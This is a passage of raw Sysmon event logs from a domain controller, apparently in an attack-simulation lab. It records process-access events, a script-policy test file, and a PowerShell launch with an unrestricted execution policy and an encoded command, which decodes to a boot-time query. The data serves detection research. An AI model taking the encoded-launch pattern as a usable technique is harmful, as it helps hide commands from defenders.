10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.957{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.957{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.957{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.497{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.497{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.497{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.278{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.278{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.200{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1u2pn5ro.fif.ps12020-11-03 15:50:27.200 10341000x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.184{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7C43-5FA1-1503-000000008701}44084264C:\Windows\system32\conhost.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7C43-5FA1-1603-000000008701}46764360C:\Windows\system32\cmd.exe{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.142{D28789B6-7C43-5FA1-1703-000000008701}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C43-5FA1-7F57-110000000000}0x11577f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C43-5FA1-1603-000000008701}4676C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 